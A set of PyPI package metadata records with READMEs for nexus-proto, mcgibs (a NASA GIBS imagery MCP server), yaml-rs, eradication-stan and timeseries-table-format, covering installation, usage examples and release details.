# Nexus Proto Shared Protocol Buffer definitions for Nexus microservices. ## Why "Nexus"? The name **Nexus** was chosen to represent the **central connection** between microservices. In many languages, "nexus" refers to a point of intersection or link, which is exactly what this project provides: an efficient hub for communication between distributed services built in different technologies. The idea is to create a convergence point that makes it easier to integrate systems, ensuring consistent and scalable communication, no matter the language or framework used. **Nexus** is the solution that connects and unites services in a simple and effective way. ## Features - **Centralized Protocol Definitions**: All communication contracts are defined in a shared repository of `.proto` files. - **Pre-Generated Python Stubs**: Python stubs (`*_pb2.py` and `*_pb2_grpc.py`) are automatically generated and included in the package, eliminating the need for consumers to generate them. - **Multi-Language Support**: Easily integrate microservices written in different programming languages (e.g., Python, Node.js, Java, etc.). - **Scalable Communication**: Easily extend the system as new microservices are added to the architecture. - **gRPC-powered**: Leveraging gRPC for high-performance communication with built-in support for multiple programming languages. - **Industry Standard**: Follows best practices from projects like `googleapis-common-protos`, ensuring consistency and reliability. ## Installation ### Node.js / npm ```bash npm install @keeps-learn/nexus-proto ``` 📦 **npm Package**: https://www.npmjs.com/package/@keeps-learn/nexus-proto ### Python / pip ```bash pip install keeps-learn-nexus-proto ``` 📦 **PyPI Package**: https://pypi.org/project/keeps-learn-nexus-proto/ ## Quick Start - Python ### Using Pre-Generated Stubs (Recommended) ```python # Import stubs directly - no compilation needed! 
from nexus_proto.generated.myaccount import users_pb2, users_pb2_grpc from nexus_proto.generated.konquest import mission_pb2, mission_pb2_grpc # Use message types user = users_pb2.User(id="123", name="John Doe") # Use service stubs with gRPC import grpc channel = grpc.aio.secure_channel('localhost:50051', grpc.ssl_channel_credentials()) stub = users_pb2_grpc.UserServiceStub(channel) ``` See [USAGE.md](./USAGE.md) for more detailed examples and options. ## Publishing 1. Update version in `package.json`, `setup.py`, and `pyproject.toml` 2. Commit: `git commit -m "Bump version to X.Y.Z"` 3. Tag: `git tag vX.Y.Z` 4. Push: `git push origin vX.Y.Z` GitHub Actions publishes automatically to both **npmjs.com** and **pypi.org** See [PUBLISH.md](./PUBLISH.md) for detailed publishing instructions.
text/markdown
null
Keeps <tecnologia@keeps.com.br>
null
null
MIT
grpc, protobuf, proto, microservices
[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "License :: OSI Approved :: MIT License", "Programming Language :: Python :: 3", "Topic :: Software Development :: Libraries", "Topic :: Communications" ]
[]
null
null
>=3.7
[]
[]
[]
[]
[]
[]
[]
[ "Homepage, https://github.com/Keeps-Learn/nexus-proto", "Repository, https://github.com/Keeps-Learn/nexus-proto.git", "Issues, https://github.com/Keeps-Learn/nexus-proto/issues" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T22:00:13.046835
keeps_learn_nexus_proto-0.11.0.tar.gz
26,041
48/03/a0d206cc733d380439940fb66eb41898ca78bd5ae4f987be5ac9e036e88c/keeps_learn_nexus_proto-0.11.0.tar.gz
source
sdist
null
false
6f2df98325d4ce468793d862432deaee
85456745a0df5b299731787a91f69b8628bb667844c4568c759867886e3889e5
4803a0d206cc733d380439940fb66eb41898ca78bd5ae4f987be5ac9e036e88c
null
[]
240
2.4
mcgibs
2026.2.19.2
FastMCP server for NASA Global Imagery Browse Services (GIBS)
# mcgibs NASA Earth science visualizations for LLMs. An [MCP](https://modelcontextprotocol.io/) server that connects language models to [NASA GIBS](https://www.earthdata.nasa.gov/engage/open-data-services-software/earthdata-developer-portal/gibs-api) (Global Imagery Browse Services) — 1000+ visualization layers covering satellite imagery, scientific data products, and derived Earth observations, updated daily. **Three pillars:** - **Discovery** — search layers by keyword, browse measurement categories, check date availability - **Visualization** — fetch imagery and data products by place name and date, compare dates side-by-side, composite multiple layers - **Interpretation** — natural-language colormap explanations, legend graphics, scientific context No API key required. All data is freely available from NASA. ## Quick Start ### From PyPI ```bash uvx mcgibs ``` ### Add to Claude Code ```bash claude mcp add mcgibs -- uvx mcgibs ``` ### Local development ```bash git clone https://git.supported.systems/mcp/mcgibs.git cd mcgibs uv sync --all-extras uv run mcgibs ``` Or add a local dev server to Claude Code: ```bash claude mcp add mcgibs-local -- uv run --directory /path/to/mcgibs mcgibs ``` ## Tools | Tool | Description | |------|-------------| | `search_gibs_layers` | Search 1000+ layers by keyword, measurement, period, or status | | `get_layer_info` | Full metadata for a layer — instrument, platform, resolution, dates | | `list_measurements` | All measurement categories with layer counts | | `check_layer_dates` | Available date range for a layer (capabilities + live DescribeDomains) | | `get_imagery` | Fetch a visualization by layer, date, and place name or bbox | | `compare_dates` | Side-by-side comparison of two dates for change detection | | `get_imagery_composite` | Overlay up to 5 layers into a single composite image | | `explain_layer_colormap` | Natural-language explanation of what colors represent | | `get_legend` | Pre-rendered legend graphic for a layer | 
| `query_point` | Get the exact data value at a coordinate by reverse-mapping the pixel color through the layer's colormap | | `get_time_series` | Fetch imagery across multiple dates for temporal analysis (up to 12 frames) | | `resolve_place` | Geocode a place name to coordinates and bounding box | | `build_tile_url` | Construct a direct WMTS tile URL for embedding | ## Resources | URI | Description | |-----|-------------| | `gibs://catalog` | Full layer catalog grouped by measurement category | | `gibs://layer/{layer_id}` | Individual layer metadata as JSON | | `gibs://colormap/{layer_id}` | Colormap explanation for a layer | | `gibs://dates/{layer_id}` | Available date range for a layer | | `gibs://projections` | Supported GIBS projections and endpoints | ## Prompts | Prompt | Parameters | Description | |--------|------------|-------------| | `earth_overview` | *(none)* | Introduction to GIBS with suggested explorations | | `investigate_event` | `event_type`, `location`, `date` | Guided workflow for investigating natural events | | `satellite_snapshot` | `place`, `date` | Quick satellite view of any location | | `climate_monitor` | `indicator`, `location`, `start_date`, `end_date` | Track climate changes over time | | `layer_deep_dive` | `layer_id`, `location`, `date` | Full scientific analysis of a single layer | | `multi_layer_story` | `topic`, `location`, `date` | Data journalism — composite layers to tell a story | | `polar_watch` | `pole`, `date`, `compare_date` | Arctic/Antarctic ice and snow monitoring | | `quantitative_snapshot` | `layer_id`, `locations`, `date` | Query exact data values at specific coordinates | | `seasonal_timelapse` | `layer_id`, `location`, `start_date`, `end_date` | Track visual changes across multiple dates | ## Conversational Examples These examples show what interacting with mcgibs looks like from any MCP client. Tool calls and responses are abbreviated for readability. 
All images below were fetched live from NASA GIBS using the mcgibs MCP tools. ### "What's happening in the Amazon right now?" *Try this with the `satellite_snapshot` prompt: `place="Amazon Rainforest"`* > **You:** Show me what the Amazon rainforest looks like from space today. The assistant resolves the location, fetches true color imagery, and searches for relevant science layers: ``` → resolve_place("Amazon Rainforest") {"display_name": "Amazon Rainforest", "lat": -3.46, "lon": -62.21, "bbox": {"west": -73.98, "south": -16.52, "east": -43.75, "north": 5.27}} → get_imagery("MODIS_Terra_CorrectedReflectance_TrueColor", "2025-08-01", place="Amazon Rainforest") ``` <img src="docs/images/amazon-true-color.jpg" width="600" alt="MODIS true color satellite view of the Amazon Basin showing river systems threading through dense forest canopy"> *MODIS Terra Corrected Reflectance — Amazon Basin, 2025-08-01* ``` → search_gibs_layers("vegetation") Found 12 layer(s) matching 'vegetation': MODIS_Terra_NDVI_8Day MODIS/Terra Vegetation Index (NDVI), 8-Day — from 2000-02-18 (8-Day) [has colormap] ... ``` > **Assistant:** Here's the Amazon from MODIS Terra — the river system is clearly visible, threading through dense canopy with sediment-laden water distinguishable from the dark forest. Some cloud cover is visible in the upper right. I also found vegetation index layers. Want me to overlay NDVI to show vegetation density, or check for fire/deforestation activity? --- ### Understanding what the colors mean *Try this with the `layer_deep_dive` prompt: `layer_id="AIRS_L3_Surface_Air_Temperature_Daily_Day"`* > **You:** What does the AIRS surface temperature layer actually show? 
The assistant fetches metadata, the colormap interpretation, and sample imagery: ``` → get_layer_info("AIRS_L3_Surface_Air_Temperature_Daily_Day") {"identifier": "AIRS_L3_Surface_Air_Temperature_Daily_Day", "title": "Surface Air Temperature (Day, Daily)", "instrument": "AIRS", "platform": "Aqua", "period": "Daily", "ongoing": true, "time": {"start": "2002-08-30", "end": null}} → explain_layer_colormap("AIRS_L3_Surface_Air_Temperature_Daily_Day") Surface Air Temperature (K): - light blue = below 200 K (-73.1 C) -- extreme cold - purple = ~230 K (-43.4 C) -- extreme cold - blue = ~260 K (-13.4 C) -- cold - orange = ~290 K (17.1 C) -- mild - magenta = above 320 K (46.9 C) -- extreme heat Color gradient runs from light blues (low values) through blues to magentas (high values). (242 color stops total, 5 key values shown) Transparent / no-data: No Data → get_imagery("AIRS_L3_Surface_Air_Temperature_Daily_Day", "2025-07-15", bbox=[-180, -90, 180, 90]) ``` <img src="docs/images/temperature-global.jpg" width="600" alt="Global surface air temperature map showing warm oranges and reds at the equator, cool blues and purples at the poles"> *AIRS Surface Air Temperature — global view, 2025-07-15. Black diagonal gaps are orbital swaths where the satellite hadn't passed yet.* ``` → get_legend("AIRS_L3_Surface_Air_Temperature_Daily_Day") ``` <img src="docs/images/temperature-legend.png" width="400" alt="Color legend bar for surface air temperature, ranging from below 200K to above 320K"> > **Assistant:** The AIRS instrument on NASA's Aqua satellite measures surface air temperature globally every day, and has been doing so since August 2002. The colormap runs from light blue (below -73°C, Antarctic interior) through purples and blues (cold/freezing) to orange (mild, ~17°C) and magenta (above 47°C, Saharan extremes). The diagonal black stripes are orbital gaps — the satellite covers the full globe, but not every location is observed on the same day. 
Areas with no valid retrieval show as transparent. --- ### Tracking change over time *Try this with the `climate_monitor` prompt: `indicator="sea ice", location="Arctic", start_date="2025-03-01", end_date="2025-09-01"`* > **You:** How has Arctic sea ice changed between winter and summer this year? The assistant uses the `climate_monitor` workflow — search, verify dates, compare: ``` → search_gibs_layers("sea ice concentration") Found 8 layer(s) matching 'sea ice concentration': AMSRU2_Sea_Ice_Concentration_12km Sea Ice Concentration (12 km, AMSRU2, GCOM-W1) — from 2012-07-02 (Daily) [has colormap] ... → compare_dates("AMSRU2_Sea_Ice_Concentration_12km", "2025-03-01", "2025-09-01", bbox=[-180, 60, 180, 90]) ``` <img src="docs/images/arctic-ice-comparison.jpg" width="600" alt="Side-by-side comparison of Arctic sea ice: March 2025 showing near-complete coverage versus September 2025 showing dramatic retreat"> *AMSRU2 Sea Ice Concentration — Left: March 2025 (winter maximum) | Right: September 2025 (summer minimum). White/pink = high concentration, colorful edges = ice margin with varying concentration, black = open water or land.* > **Assistant:** The side-by-side view is striking. In March (left), the Arctic Ocean shows near-complete ice coverage — white and pale pink across the entire basin, with the ice edge extending well into the Bering Sea and Barents Sea. By September (right), the ice has retreated dramatically — the remaining pack ice is confined to a much smaller core around the pole, with extensive open water (black) visible along the entire Russian coastline and into the Canadian Archipelago. The colorful fringe along the ice edge shows the marginal ice zone where concentration drops from solid pack to scattered floes. 
--- ### Compositing layers to tell a story *Try this with the `investigate_event` prompt: `event_type="wildfire", location="Los Angeles", date="2025-01-08"`* > **You:** Can you show me how wildfire smoke from the 2025 LA fires affected air quality? The assistant searches for complementary layers, checks dates, and builds a composite: ``` → search_gibs_layers("aerosol") Found 8 layer(s) matching 'aerosol': MODIS_Terra_Aerosol_Optical_Depth MODIS/Terra Aerosol Optical Depth — from 2000-02-24 (Daily) [has colormap] ... → search_gibs_layers("fire thermal") Found 4 layer(s) matching 'fire thermal': MODIS_Fires_Terra MODIS/Terra Thermal Anomalies and Fire — from 2000-02-24 (Daily) [has colormap] ... → get_imagery_composite( ["MODIS_Terra_CorrectedReflectance_TrueColor", "MODIS_Terra_Aerosol_Optical_Depth"], "2025-01-08", place="Los Angeles") [composite image: true color with aerosol optical depth overlay] → explain_layer_colormap("MODIS_Terra_Aerosol_Optical_Depth") Aerosol Optical Depth: - yellow-green = ~0.15 (clean air) - orange = ~0.55 (moderate haze) - dark red = ~1.0 (thick smoke/dust) ... ``` > **Assistant:** The composite overlay tells the story clearly. Over the LA basin, the true color base shows a visible smoke plume extending southwest over the Pacific. The aerosol optical depth overlay confirms it — the orange-to-red values (0.5-1.0) directly over the fire zone indicate thick particulate loading, fading to yellow-green (0.15, clean air) further out over the ocean. The fire thermal anomaly layer pinpoints the active burn areas as bright red hotspots in the foothills. --- ### Querying exact values at a point *Try this with the `quantitative_snapshot` prompt: `layer_id="AIRS_L3_Surface_Air_Temperature_Daily_Day", locations="Tokyo, Sydney, Sahara Desert", date="2025-07-15"`* > **You:** What's the actual surface temperature in Tokyo, Sydney, and the Sahara right now? 
The assistant queries exact data values by reverse-mapping pixel colors through the layer's colormap: ``` → explain_layer_colormap("AIRS_L3_Surface_Air_Temperature_Daily_Day") Surface Air Temperature (K): - light blue = below 200 K (-73.1 C) - blue = ~260 K (-13.4 C) - orange = ~290 K (17.1 C) - magenta = above 320 K (46.9 C) (242 color stops total, 5 key values shown) → query_point("AIRS_L3_Surface_Air_Temperature_Daily_Day", "2025-07-15", lat=35.68, lon=139.69) {"value": 299.2, "units": "K", "converted": "26.1 C", "color": "orange", "quality": "exact", "description": "mild"} → query_point(..., lat=-33.87, lon=151.21) {"value": 282.8, "units": "K", "converted": "9.6 C", "color": "blue", "quality": "exact", "description": "near freezing"} → query_point(..., lat=25.0, lon=25.0) {"value": 304.8, "units": "K", "converted": "31.6 C", "color": "red", "quality": "exact", "description": "hot"} ``` > **Assistant:** Here are the AIRS-measured surface air temperatures for July 15, 2025: > > | Location | Temperature | Condition | > |----------|------------|-----------| > | Tokyo | 26.1°C (299.2 K) | Mild summer day | > | Sydney | 9.6°C (282.8 K) | Cool — it's winter in the Southern Hemisphere | > | Sahara | 31.6°C (304.8 K) | Hot, typical for desert in July | > > These come from the Atmospheric Infrared Sounder (AIRS) on NASA's Aqua satellite. The resolution is about 0.5°C — each of the 242 colormap entries covers a narrow value range, so the reverse-mapped pixel color gives an exact match to the original data. --- ### Watching a season unfold *Try this with the `seasonal_timelapse` prompt: `layer_id="MODIS_Terra_NDVI_8Day", location="Great Plains, USA", start_date="2025-03-01", end_date="2025-09-01"`* > **You:** Show me how vegetation changes across the US Great Plains from winter to summer. 
The assistant fetches a sequence of images at regular intervals: ``` → search_gibs_layers("NDVI") MODIS_Terra_NDVI_8Day MODIS/Terra Vegetation Index (NDVI), 8-Day — from 2000-02-18 (8-Day) [has colormap] → explain_layer_colormap("MODIS_Terra_NDVI_8Day") Vegetation Index (NDVI): - tan/brown = ~0.1 (bare soil, dormant vegetation) - yellow-green = ~0.3 (sparse vegetation) - green = ~0.6 (moderate vegetation) - dark green = ~0.9 (dense, healthy vegetation) → get_time_series("MODIS_Terra_NDVI_8Day", place="Great Plains USA", start_date="2025-03-01", end_date="2025-09-01", steps=6) [6 images: Mar 1, Apr 13, May 25, Jul 6, Aug 17, Sep 1] ``` <p align="center"> <img src="docs/images/ndvi-march.png" width="250" alt="Great Plains NDVI March — mostly brown, dormant vegetation"> <img src="docs/images/ndvi-june.png" width="250" alt="Great Plains NDVI June — vivid green, peak growing season"> <img src="docs/images/ndvi-september.png" width="250" alt="Great Plains NDVI September — mixed green and brown, harvest underway"> </p> <p align="center"><em>Great Plains vegetation: March (dormant) → June (peak growth) → September (harvest)</em></p> > **Assistant:** The six frames tell a clear story of the growing season: > > 1. **March** — The Plains are mostly tan/brown (NDVI ~0.1), winter dormancy. Only southern Texas shows hints of green. > 2. **April** — A flush of yellow-green creeps north from Oklahoma as winter wheat greens up. > 3. **May** — The green wave accelerates — Kansas and Nebraska shift to solid green (NDVI ~0.5) as corn and soybean planting peaks. > 4. **July** — Peak vegetation. The entire region is dark green (NDVI 0.7-0.9). Crop canopy is fully closed. > 5. **August** — Still green but beginning to yellow at the margins. Early harvest in southern counties. > 6. **September** — Harvest underway. The palette shifts back toward yellow-green and tan as crops are cut. 
--- ### Polar ice in proper projection *Try this with the `polar_watch` prompt: `pole="arctic", date="2025-03-01"`* > **You:** Show me Arctic sea ice at its winter peak — and use the right map projection. The `polar_watch` prompt guides the assistant to use polar stereographic projection: ``` → get_imagery("AMSRU2_Sea_Ice_Concentration_12km", "2025-03-01", bbox=[-180, 60, 180, 90], projection="3413") [image: Arctic sea ice in polar stereographic — circular view centered on the pole] → explain_layer_colormap("AMSRU2_Sea_Ice_Concentration_12km") Sea Ice Concentration (%): - dark blue = ~15% (scattered floes) - cyan = ~40% - light grey = ~70% - white = ~100% (solid pack ice) → build_tile_url("AMSRU2_Sea_Ice_Concentration_12km", "2025-03-01", zoom=2, row=0, col=0, projection="3413") https://gibs.earthdata.nasa.gov/wmts/epsg3413/best/AMSRU2_Sea_Ice_Concentration_12km/... ``` <p align="center"> <img src="docs/images/arctic-polar-stereo.png" width="500" alt="Arctic sea ice concentration in polar stereographic projection — March peak extent showing ice covering most of the Arctic basin"> </p> <p align="center"><em>Arctic sea ice, March 2025 — EPSG:3413 polar stereographic projection</em></p> > **Assistant:** With polar stereographic projection (EPSG:3413), the Arctic is shown as a circular view centered on the North Pole — no more equirectangular distortion. The March maximum extent fills the basin: solid pack ice (white/pink, 90-100%) dominates the center, with concentration gradients at the margins where ice meets open water. The colorful fringe marks coastlines and the marginal ice zone. The embeddable WMTS tile URL is ready for dashboards or reports. 
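--- ### How the exact-value queries work The exact-value queries shown above reverse-map a rendered pixel's color back through the layer's colormap. A minimal pure-Python sketch of that idea, using a made-up four-stop colormap rather than the real 242-entry AIRS one (illustrative only, not mcgibs internals):

```python
# Illustrative sketch of colormap reverse-mapping, NOT the mcgibs implementation.
# A GIBS colormap maps data values to RGB colors; a point query inverts that:
# sample the pixel's color, then find the colormap entry with the nearest color.

# Hypothetical tiny colormap: (data value in kelvin, (r, g, b))
COLORMAP = [
    (200.0, (173, 216, 230)),  # light blue - extreme cold
    (260.0, (0, 0, 255)),      # blue       - cold
    (290.0, (255, 165, 0)),    # orange     - mild
    (320.0, (255, 0, 255)),    # magenta    - extreme heat
]

def reverse_map(pixel: tuple[int, int, int]) -> float:
    """Return the data value whose colormap color is closest to `pixel`."""
    def dist2(color: tuple[int, int, int]) -> int:
        # Squared Euclidean distance in RGB space.
        return sum((a - b) ** 2 for a, b in zip(color, pixel))

    value, _color = min(COLORMAP, key=lambda entry: dist2(entry[1]))
    return value

print(reverse_map((250, 160, 10)))  # near-orange pixel -> 290.0
```

With a dense colormap like the 242-stop AIRS one, each entry covers only a narrow value range, so the nearest-color match pins down the original data value closely — which is why `query_point` can report `"quality": "exact"`.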
## Projections | EPSG | Description | Use case | |------|-------------|----------| | 4326 | Geographic (WGS84) | Default — global coverage, most layers | | 3857 | Web Mercator | Web map tiles, Leaflet/Mapbox integration | | 3413 | Arctic Polar Stereographic | Arctic-focused imagery | | 3031 | Antarctic Polar Stereographic | Antarctic-focused imagery | ## Development ```bash uv sync --all-extras # Lint uv run ruff check src/ tests/ # Tests uv run pytest # Build uv build ``` ## Architecture ``` src/mcgibs/ server.py MCP server — tools, resources, prompts, middleware client.py GIBS HTTP client — WMS, WMTS, colormaps, geocoding capabilities.py WMTS GetCapabilities parser and layer search colormaps.py Colormap XML parser and natural-language interpreter models.py Pydantic models — Layer, BBox, GeoResult, ColormapEntry constants.py API endpoints, projections, tile matrix definitions geo.py Bounding box math and geocoding helpers ``` ## License [MIT](LICENSE) ## Links - [NASA GIBS](https://www.earthdata.nasa.gov/engage/open-data-services-software/earthdata-developer-portal/gibs-api) - [GIBS API Documentation](https://nasa-gibs.github.io/gibs-api-docs/) - [Worldview](https://worldview.earthdata.nasa.gov/) — NASA's browser-based GIBS viewer - [FastMCP](https://gofastmcp.com/) — the MCP framework powering this server - [Source](https://git.supported.systems/mcp/mcgibs)
text/markdown
null
Ryan Malloy <ryan@supported.systems>
null
null
MIT
earth-science, gibs, imagery, mcp, nasa, satellite
[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "Intended Audience :: Science/Research", "License :: OSI Approved :: MIT License", "Programming Language :: Python :: 3.12", "Programming Language :: Python :: 3.13", "Programming Language :: Python :: 3.14", "Topic :: Scientific/Eng...
[]
null
null
>=3.12
[]
[]
[]
[ "defusedxml>=0.7.1", "fastmcp>=3.0.0", "pillow>=12.0.0", "pytest-asyncio>=1.0.0; extra == \"dev\"", "pytest>=8.0.0; extra == \"dev\"", "respx>=0.22.0; extra == \"dev\"", "ruff>=0.9.0; extra == \"dev\"" ]
[]
[]
[]
[ "Homepage, https://git.supported.systems/mcp/mcgibs", "Documentation, https://nasa-gibs.github.io/gibs-api-docs/", "Bug Tracker, https://git.supported.systems/mcp/mcgibs/issues" ]
uv/0.9.26 {"installer":{"name":"uv","version":"0.9.26","subcommand":["publish"]},"python":null,"implementation":{"name":null,"version":null},"distro":{"name":"EndeavourOS","version":null,"id":null,"libc":null},"system":{"name":null,"release":null},"cpu":null,"openssl_version":null,"setuptools_version":null,"rustc_version":null,"ci":null}
2026-02-19T22:00:03.194734
mcgibs-2026.2.19.2.tar.gz
2,524,322
5a/1c/62d4b337c556365dfcb8ae07748823864f609fc119163a70a3dd92eba625/mcgibs-2026.2.19.2.tar.gz
source
sdist
null
false
14a58505c5238a122dc617cc574adeb7
47a2d4ef0a3a53b25b078be37e419b76a3a3a633a4ed4373707493708f18d668
5a1c62d4b337c556365dfcb8ae07748823864f609fc119163a70a3dd92eba625
null
[ "LICENSE" ]
186
2.4
yaml-rs
0.0.12
A High-Performance YAML Parser for Python written in Rust
<div align="center">

# yaml-rs

*A High-Performance YAML parser for Python written in Rust*

[![PyPI License](https://img.shields.io/pypi/l/yaml_rs.svg?style=flat-square)](https://pypi.org/project/yaml_rs/)
[![Python version](https://img.shields.io/pypi/pyversions/yaml_rs.svg?style=flat-square)](https://pypi.org/project/yaml_rs/)
[![Implementation](https://img.shields.io/pypi/implementation/yaml_rs.svg?style=flat-square)](https://pypi.org/project/yaml_rs/)
[![Monthly downloads](https://img.shields.io/pypi/dm/yaml_rs.svg?style=flat-square)](https://pypi.org/project/yaml_rs/)
[![Github Repository size](https://img.shields.io/github/repo-size/lava-sh/yaml-rs?style=flat-square)](https://github.com/lava-sh/yaml-rs)

</div>

## Features

* The fastest YAML parser in Python (see [benchmarks](https://github.com/lava-sh/yaml-rs/tree/main/benchmark))
* Full YAML v1.2 spec support

## Installation

```bash
# Using pip
pip install yaml-rs

# Using uv
uv pip install yaml-rs
```

## Examples

```python
from pprint import pprint

import yaml_rs

yaml = """\
app:
  name: service
  environment: production
  debug: false
  version: 1.3.5
log:
  level: INFO
  file: /var/log/service/app.log
  rotation:
    enabled: true
    max_size_mb: 50
database:
  engine: mariadb
  host: localhost
  port: 3306
  username: app_user
  password: super_secret_password
  pool_size: 10
  timeout_seconds: 30
metadata:
  author: "John Doe"
  created_at: 2024-01-15T12:00:00Z
  updated_at: 2025-11-09T10:30:00Z
"""

pprint(yaml_rs.loads(yaml))
```

## Why not [pyyaml](https://pypi.org/project/PyYAML), [ruamel.yaml](https://pypi.org/project/ruamel.yaml), [strictyaml](https://pypi.org/project/strictyaml)?

`PyYAML` and `ruamel.yaml` can't parse examples 2.23, 2.24, 2.27, 2.28, etc. from the [YAML spec](https://yaml.org/spec/1.2.2), and they also do not pass all tests from the [yaml-test-suite](https://github.com/yaml/yaml-test-suite). `strictyaml` uses `ruamel.yaml` as its parser, so it inherits the same bugs.
```python
import yaml as pyyaml

example_2_23 = """\
---
not-date: !!str 2002-04-28
picture: !!binary |
 R0lGODlhDAAMAIQAAP//9/X
 17unp5WZmZgAAAOfn515eXv
 Pz7Y6OjuDg4J+fn5OTk6enp
 56enmleECcgggoBADs=
application specific tag: !something |
 The semantics of the tag above may be different for different documents.
"""

print(pyyaml.safe_load(example_2_23))  # yaml.constructor.ConstructorError
```

```python
import yaml as pyyaml
from ruamel.yaml import YAML

yaml_safe = YAML(typ="safe")

yaml = "! 15"  # must be str

pyyaml_load = pyyaml.safe_load(yaml)
ruamel_yaml_load = yaml_safe.load(yaml)

print(pyyaml_load)  # 15
print(type(pyyaml_load))  # <class 'int'>
print(ruamel_yaml_load)  # 15
print(type(ruamel_yaml_load))  # <class 'int'>
```
text/markdown; charset=UTF-8; variant=GFM
null
chirizxc <chirizxc@proton.me>
null
chirizxc <chirizxc@proton.me>
null
null
[ "Typing :: Typed", "Programming Language :: Rust", "Programming Language :: Python", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: Python :: 3.13", "Program...
[]
null
null
>=3.10
[]
[]
[]
[]
[]
[]
[]
[ "Bug Tracker, https://github.com/lava-sh/yaml-rs/issues", "Homepage, https://github.com/lava-sh/yaml-rs", "Source, https://github.com/lava-sh/yaml-rs" ]
maturin/1.12.3
2026-02-19T21:59:40.131300
yaml_rs-0.0.12-cp314-cp314t-win32.whl
438,648
8b/ab/29e60510c07224505d02ff07e8166870ac366e6635e225f86afc66ef665a/yaml_rs-0.0.12-cp314-cp314t-win32.whl
cp314
bdist_wheel
null
false
b1241fa454d8b93b333a8ba54f7f9be2
797a57e2064a179b4897527661af526756b9d6a52fbb2307de58edd2efd6b262
8bab29e60510c07224505d02ff07e8166870ac366e6635e225f86afc66ef665a
null
[]
7,136
2.4
eradication-stan
0.2.0
A python wrapper for cmdStan
<a href="https://www.islas.org.mx/"><img src="https://www.islas.org.mx/img/logo.svg" align="right" width="256" /></a>

# Eradication Stan

[![codecov](https://codecov.io/gh/IslasGECI/eradication_stan/graph/badge.svg?token=RY807ST1T1)](https://codecov.io/gh/IslasGECI/eradication_stan)
![example branch parameter](https://github.com/IslasGECI/eradication_stan/actions/workflows/actions.yml/badge.svg)
![licencia](https://img.shields.io/github/license/IslasGECI/eradication_stan)
![languages](https://img.shields.io/github/languages/top/IslasGECI/eradication_stan)
![commits](https://img.shields.io/github/commit-activity/y/IslasGECI/eradication_stan)
![PyPI - Version](https://img.shields.io/pypi/v/eradication_stan)

Python wrapper used for Bayesian inference in eradication projects. 🐍

This is a wrapper for [Stan software](https://mc-stan.org/) used for a cat eradication project.
text/markdown
Ciencia de Datos • GECI
ciencia.datos@islas.org.mx
null
null
null
null
[ "License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)" ]
[]
https://github.com/IslasGECI/eradication_stan
null
>=3.9
[]
[]
[]
[ "fastapi", "httpx", "pandas", "python-multipart", "pandas-stubs; extra == \"dev\"", "geci-test-tools; extra == \"dev\"" ]
[]
[]
[]
[]
twine/6.1.0 CPython/3.13.7
2026-02-19T21:59:05.513318
eradication_stan-0.2.0.tar.gz
14,054
fc/69/ff9ec7200c10d9ccea9762465d11a14196580eaa862732fc53ace38c6036/eradication_stan-0.2.0.tar.gz
source
sdist
null
false
84ee28fb1949d938c144ef6bcc9ad0d0
31d4fca17bd081293169ef857fae3f7488ef1c249cfaa4fc95331dce78249bd1
fc69ff9ec7200c10d9ccea9762465d11a14196580eaa862732fc53ace38c6036
null
[ "LICENSE" ]
221
2.4
timeseries-table-format
0.1.3
Append-only time-series table format with gap/overlap tracking (Python bindings).
# timeseries-table-format (Python) Python-first workflow for managing local, append-only time-series tables stored as Parquet segments on disk, with SQL querying (DataFusion) that returns `pyarrow.Table`. - PyPI: `timeseries-table-format` - Import: `timeseries_table_format` - Docs: https://mag1cfrog.github.io/timeseries-table-format/ v0 is local-filesystem-only (no S3/object storage backend yet). ## Install ```bash pip install timeseries-table-format ``` Requires: Python 3.10+. `pyarrow` is installed automatically (dependency: `pyarrow>=23.0.0`). If `pip` tries to build from source (Rust errors), see Troubleshooting below. ## Verify installation ```python import timeseries_table_format as ttf out = ttf.Session().sql("select 1 as x") print(type(out)) # pyarrow.Table ``` ## Return type and interop `Session.sql(...)` returns a `pyarrow.Table`. - Polars: `pip install polars`, then `polars.from_arrow(out)` ## Notebook display (Jupyter/IPython) In IPython/Jupyter (including VS Code notebooks), `pyarrow.Table` results will display as a bounded HTML preview by default (the return type is still a real `pyarrow.Table`). - Defaults: `max_rows=20` (head/tail), `max_cols=50` (left/right), `max_cell_chars=2000` - Opt-out: set `TTF_NOTEBOOK_DISPLAY=0` before importing `timeseries_table_format`, or call `timeseries_table_format.disable_notebook_display()` - Configure: call `timeseries_table_format.enable_notebook_display(max_rows=..., max_cols=..., max_cell_chars=..., align=...)` - Config file (TOML): set `TTF_NOTEBOOK_CONFIG=path/to/ttf.toml` before importing `timeseries_table_format` (or call `timeseries_table_format.load_notebook_display_config("path/to/ttf.toml")`) (On Python 3.10, install `tomli` to enable TOML parsing.) 
- Alignment: `align="right"` (default) or `align="auto"` (strings left, numbers right); auto-enable can be configured with `TTF_NOTEBOOK_ALIGN=auto|left|right` - Cells are visually clipped to a bounded column width with an ellipsis indicator; copying a cell copies the underlying value (up to `max_cell_chars`). Example `ttf.toml`: ```toml [notebook_display] max_rows = 20 max_cols = 50 max_cell_chars = 2000 align = "auto" ``` ## Maintainers: releasing the Python package The PyPI package version is derived from `crates/timeseries-table-python/Cargo.toml` (via maturin). If you change the pure-Python sources under `python/src/` (or `python/pyproject.toml` / `python/README.md`), CI will automatically update `crates/timeseries-table-python/python-src.stamp` on PRs from branches in this repository. If you need to update it locally (e.g. working on a fork, or before pushing), run: ```bash python3 scripts/update_python_wheel_stamp.py ``` If your development environment uses the repo venv, you can also run: ```bash python/.venv/bin/python scripts/update_python_wheel_stamp.py ``` CI enforces the stamp, and it helps the release automation notice python-only changes for version bumps. 
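The bounded notebook preview described earlier keeps only the head and tail of large results. A minimal pure-Python sketch of that row-bounding idea, assuming `max_rows` splits evenly between head and tail (an illustration of the truncation shape, not the package's actual implementation):

```python
# Illustrative sketch of head/tail row bounding, NOT the package's implementation.
def bound_rows(rows: list, max_rows: int = 20) -> list:
    """Keep the first and last max_rows // 2 rows, with an ellipsis marker between."""
    if len(rows) <= max_rows:
        return rows  # small enough: show everything
    half = max_rows // 2
    return rows[:half] + ["..."] + rows[-half:]

preview = bound_rows(list(range(100)), max_rows=20)
print(len(preview))  # 21 (10 head rows + marker + 10 tail rows)
print(preview[:3])   # [0, 1, 2]
print(preview[-1])   # 99
```

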